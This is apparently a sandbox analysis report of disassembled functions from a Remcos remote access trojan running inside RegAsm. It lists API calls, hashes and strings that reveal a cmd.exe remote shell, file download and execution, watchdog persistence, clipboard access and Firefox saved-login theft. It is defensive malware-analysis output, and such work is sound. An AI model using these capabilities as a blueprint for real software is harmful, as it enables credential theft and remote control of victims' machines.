                                                                                              • Opcode ID: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                                                                                              • Instruction ID: f8901b274c9ac7999680b04b2037e580393277d5e39e0d99f0e7f02c98ef4e36
                                                                                              • Opcode Fuzzy Hash: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                                                                                              • Instruction Fuzzy Hash: 8FE05530640318F7D3016B21DC16A2FBB94DB04B22B10006FFD0553241EE794D15C5CE
                                                                                              Function 00438E14 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • try_get_function.LIBVCRUNTIME ref: 00438E29
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: try_get_function
                                                                                              • String ID: FlsAlloc
                                                                                              • API String ID: 2742660187-671089009
                                                                                              • Opcode ID: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                                                                              • Instruction ID: b64d3ab94c56a33c1928a034b10f94234fe941941be7f39555266fb58f36a209
                                                                                              • Opcode Fuzzy Hash: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                                                                              • Instruction Fuzzy Hash: 09D02B31BC1328B6C51032955C03BD9B6048B00FF7F002067FF0C61283899E592082DE
                                                                                              Function 0044F199 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044F03A,?,00000000), ref: 0044F20D
                                                                                              • GetCPInfo.KERNEL32(00000000,0044F03A,?,?,?,0044F03A,?,00000000), ref: 0044F220
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CodeInfoPageValid
                                                                                              • String ID:
                                                                                              • API String ID: 546120528-0
                                                                                              • Opcode ID: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                                                                              • Instruction ID: 491245c4813b68437391e3e70942b885a5b84425ef1b1be509cf98dd56c33fdc
                                                                                              • Opcode Fuzzy Hash: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                                                                              • Instruction Fuzzy Hash: A05153749002469EFB208F76C8816BBBBE4FF01304F1480BFD48687251E67E994A8B99
                                                                                              Function 0044EFD8 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                • Part of subcall function 0044F0F7: _abort.LIBCMT ref: 0044F129
                                                                                                • Part of subcall function 0044F0F7: _free.LIBCMT ref: 0044F15D
                                                                                                • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                                                              • _free.LIBCMT ref: 0044F050
                                                                                              • _free.LIBCMT ref: 0044F086
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorLast_abort
                                                                                              • String ID:
                                                                                              • API String ID: 2991157371-0
                                                                                              • Opcode ID: 5c488e73cd7317a59bb91e94e032dcb6bf067ffc0982221c2c2ef85a747d1bec
                                                                                              • Instruction ID: a9f826519387c1ac895116d2974c89b4af6d1f604a138ae73dd4863203302c4b
                                                                                              • Opcode Fuzzy Hash: 5c488e73cd7317a59bb91e94e032dcb6bf067ffc0982221c2c2ef85a747d1bec
                                                                                              • Instruction Fuzzy Hash: 2D31D371900104AFEB10EB69D441B9A77F4EF81325F2540AFE5049B2A3DB7A5D44CB58
                                                                                              Function 0044854A Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367,00000000), ref: 004485AA
                                                                                              • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProc__crt_fast_encode_pointer
                                                                                              • String ID:
                                                                                              • API String ID: 2279764990-0
                                                                                              • Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                                                              • Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
                                                                                              • Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                                                              • Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9
                                                                                              Function 0041CB72 Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8), ref: 0041CB9A
                                                                                              • LocalFree.KERNEL32(?,?), ref: 0041CBC0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FormatFreeLocalMessage
                                                                                              • String ID:
                                                                                              • API String ID: 1427518018-0
                                                                                              • Opcode ID: 82b7d99133a533cf28a51f4fe1ebea5b1148f2cd1554d609742055ada2217fc8
                                                                                              • Instruction ID: 923000db8f6a2d31ebee0df48ef62036c6bc2ff20d3f060cbaedccf048ea6ec3
                                                                                              • Opcode Fuzzy Hash: 82b7d99133a533cf28a51f4fe1ebea5b1148f2cd1554d609742055ada2217fc8
                                                                                              • Instruction Fuzzy Hash: 34F0A930B00219A6DF14A766DC4ADFF772DDB44305B10407FB605B21D1DE785D059659
                                                                                              Function 0040482D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • socket.WS2_32(?,00000001,00000006), ref: 00404852
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                                                                • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateEventStartupsocket
                                                                                              • String ID:
                                                                                              • API String ID: 1953588214-0
                                                                                              • Opcode ID: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                                              • Instruction ID: ed99eca956a2b7a9b5891d615cc725ddac26720bb1770143763ad27df005c20f
                                                                                              • Opcode Fuzzy Hash: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                                              • Instruction Fuzzy Hash: 760171B1408B809ED7359F38A8456877FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                                                              Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                                                                              • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                                                                              • Opcode Fuzzy Hash: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                                                                              • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                                                                              Function 00414F24 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,004151C3,00000000,00000001), ref: 00414F46
                                                                                              • WSASetLastError.WS2_32(00000000), ref: 00414F4B
                                                                                                • Part of subcall function 00414DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                                                • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                                                • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                                                • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                                                • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                                                • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                                                • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                                                • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                              • String ID:
                                                                                              • API String ID: 1170566393-0
                                                                                              • Opcode ID: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                                                                                              • Instruction ID: 64a5677b7ab27dcaa32d5743096e05a6e92bfc5102e3e8065abb212a99eff034
                                                                                              • Opcode Fuzzy Hash: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                                                                                              • Instruction Fuzzy Hash: 23D017322005316BD320A769AC00AEBAA9EDFD6760B12003BBD08D2251DA949C8286E8
                                                                                              Function 0043A46C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00438E14: try_get_function.LIBVCRUNTIME ref: 00438E29
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A48A
                                                                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A495
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                              • String ID:
                                                                                              • API String ID: 806969131-0
                                                                                              • Opcode ID: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                                                              • Instruction ID: eb5cae5cbee30b1ad319c652a9e61f9a188d1dba44d7e0681113cf8ff6ee03f7
                                                                                              • Opcode Fuzzy Hash: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                                                              • Instruction Fuzzy Hash: 34D0A725584340141C04A279381B19A1348193A778F70725FF5A0C51D2EEDD4070512F
                                                                                              Function 0043AA9B Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: __alldvrm
                                                                                              • String ID:
                                                                                              • API String ID: 65215352-0
                                                                                              • Opcode ID: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                                                                                              • Instruction ID: 3aa9a871bb282a4e2fa9f206226bba5a96c76ae51e783e445703a1682bb04715
                                                                                              • Opcode Fuzzy Hash: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                                                                                              • Instruction Fuzzy Hash: 51014CB2950308BFDB24EF64C902B6EBBECEB04328F10452FE445D7201C278AD40C75A
                                                                                              Function 004461B8 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                              • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                                                                              • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                              • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                                                                              Function 0040489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Startup
                                                                                              • String ID:
                                                                                              • API String ID: 724789610-0
                                                                                              • Opcode ID: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                                                              • Instruction ID: 97c3e6bab4f4407137ad71e204409d8be70fba83985c90e8682379c152a4c00d
                                                                                              • Opcode Fuzzy Hash: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                                                              • Instruction Fuzzy Hash: 92D0123255C70C8EE620ABB4AD0F8A4775CC317616F0007BA6CB5836D3E6405B1DC2AB
                                                                                              Function 00426D59 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: send
                                                                                              • String ID:
                                                                                              • API String ID: 2809346765-0
                                                                                              • Opcode ID: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                                              • Instruction ID: 21703143275c54c82102de5c78eddca0fb0a16d203a0de67c7bd570fb3111ac2
                                                                                              • Opcode Fuzzy Hash: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                                              • Instruction Fuzzy Hash: 87B09B75108301FFD6150760CC0486A7D6597C8341F00491C718741170C635C8515725

                                                                                              Non-executed Functions

                                                                                              Function 00407CD2 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                                                              • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                                                                • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                                                                • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                                                                • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                                                                • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                                                                • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                                • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                                                              • GetLogicalDriveStringsA.KERNEL32 ref: 004082B3
                                                                                              • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                                                              • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                                                                • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                                                                • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                                • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                                • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                              • Sleep.KERNEL32(000007D0), ref: 00408733
                                                                                              • StrToIntA.SHLWAPI(00000000), ref: 00408775
                                                                                                • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                                              • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                                                              • API String ID: 1067849700-181434739
                                                                                              • Opcode ID: 24e77b4a64614efd1536686dc2794b6ca74182b83d726372a4bee46d640c42f3
                                                                                              • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                                                                              • Opcode Fuzzy Hash: 24e77b4a64614efd1536686dc2794b6ca74182b83d726372a4bee46d640c42f3
                                                                                              • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                                                                              Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                              • __Init_thread_footer.LIBCMT ref: 00405723
                                                                                              • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                                                                              • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                                                              • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                                                              • PeekNamedPipe.KERNEL32 ref: 004058BC
                                                                                              • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                                                • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                              • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                                                                                              • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                                                              • CloseHandle.KERNEL32 ref: 00405A23
                                                                                              • CloseHandle.KERNEL32 ref: 00405A2B
                                                                                              • CloseHandle.KERNEL32 ref: 00405A3D
                                                                                              • CloseHandle.KERNEL32 ref: 00405A45
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                              • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                                                              • API String ID: 2994406822-18413064
                                                                                              • Opcode ID: 0124ace086f5de225a953bf3970e0a258168e3bb706247aa9417043a727e3f71
                                                                                              • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                                                                              • Opcode Fuzzy Hash: 0124ace086f5de225a953bf3970e0a258168e3bb706247aa9417043a727e3f71
                                                                                              • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                                                                              Function 00412132 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                                                                • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                                                • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                                                                                              • OpenMutexA.KERNEL32 ref: 00412181
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                                                              • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                              • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                                                              • API String ID: 3018269243-13974260
                                                                                              • Opcode ID: b3951b22144ccdf2d4cd1ddf70918f5d541b623d2cb9c2a4b7a34346c44b0be3
                                                                                              • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                                                                              • Opcode Fuzzy Hash: b3951b22144ccdf2d4cd1ddf70918f5d541b623d2cb9c2a4b7a34346c44b0be3
                                                                                              • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                                                                              Function 0040BB6B Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                                                              • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                                                              • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFile$FirstNext
                                                                                              • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                              • API String ID: 1164774033-3681987949
                                                                                              • Opcode ID: 1dd2d77424a1feb7b81cbbfb01062b06d0993b8648acb28e4275aca406a32408
                                                                                              • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                                                              • Opcode Fuzzy Hash: 1dd2d77424a1feb7b81cbbfb01062b06d0993b8648acb28e4275aca406a32408
                                                                                              • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                                                              Function 004168FC Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OpenClipboard.USER32 ref: 004168FD
                                                                                              • EmptyClipboard.USER32 ref: 0041690B
                                                                                              • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00416934
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                                                                              • CloseClipboard.USER32 ref: 00416990
                                                                                              • OpenClipboard.USER32 ref: 00416997
                                                                                              • GetClipboardData.USER32 ref: 004169A7
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                              • CloseClipboard.USER32 ref: 004169BF
                                                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
